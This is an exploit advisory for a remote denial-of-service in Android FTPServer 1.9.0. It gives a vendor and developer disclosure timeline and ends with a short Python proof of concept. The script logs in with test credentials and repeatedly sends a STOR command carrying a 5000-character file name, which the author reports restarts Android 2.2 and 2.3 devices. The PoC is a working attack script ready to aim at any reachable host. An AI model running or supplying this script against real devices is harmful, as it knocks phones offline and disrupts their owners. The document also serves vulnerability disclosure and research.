# Exploit Title: Android FTPServer 1.9.0 Remote DoS # Date: 03/20/12 # Author: G13 # Twitter: @g13net # Software Site: https://sites.google.com/site/andreasliebigapps/ftpserver/ # Download Link: http://www.g13net.com/ftpserver.apk # Version: 1.9.0 # Category: DoS (android) # ##### Vulnerability ##### FTPServer is vulnerable to a DoS condition when long file names are repeatedly attempted to be written via the STOR command. Successful exploitation will causes devices to restart. Android Security Team has confirmed this issue. I have been able to test this exploit against Android 2.2 and 2.3. 4.0 (ICS) appears not to be vulnerable. ##### Vendor Timeline ##### Android Security Team: 10/20/11 - Vendor Notified of vulnerability, Vendor notifies me they will be looking into the issue 10/21/11 - vendor Requests bug report from device, bug report sent, PoC Code Delivered to Vendor 10/24/11 - Asked Vendor Status, stated I have been able to duplicate issue on multiple devices 10/25/11 - Vendor states they are still working on it 10/30/11 - Current Status asked 10/31/11 - vendor Replies no updates 11/7/11 - Emailed Vendor, they ask for more clarification on issue. I submit more details 11/8/11 - Vendor acknowledges that it is not the APK itself causing the crashes. Vendor also confirms full reboots from PoC code. 11/9/11 - Vendor asks if I am just crashing application or device in certain instances. I state device is restarting. 11/11/11 - I ask if there is anything more I may assist with. Vendor states they have isolated the impacted component and are working on a fix. 11/18/11 - Current status Asked. 12/8/11 - Update requested, response that they will contact Kernel team for an update 01/13/12 - Current status asked, no response 03/06/12 - Current status asked, no response 03/20/12 - Disclosure Developer: 1/24/12 - Developer contacted 1/25/12 - Developer Responds 1/27/12 - Supplied Developer with PoC code, Developer confirms issue 1/29/12 - Developer releases new version 3/20/12 - Disclosure ##### PoC ##### #!/usr/bin/python # Android FTPServer PoC Device Crash import socket s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) buffer = "STOR " + "A" * 5000 + "\r

" for x in xrange(1,31): s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) print x s.connect(('172.16.30.108',2121)) data=s.recv(1024) s.send("USER test\r

") data=s.recv(1024) s.send("PASS test\r

") s.send(buffer) s.send("QUIT") s.close()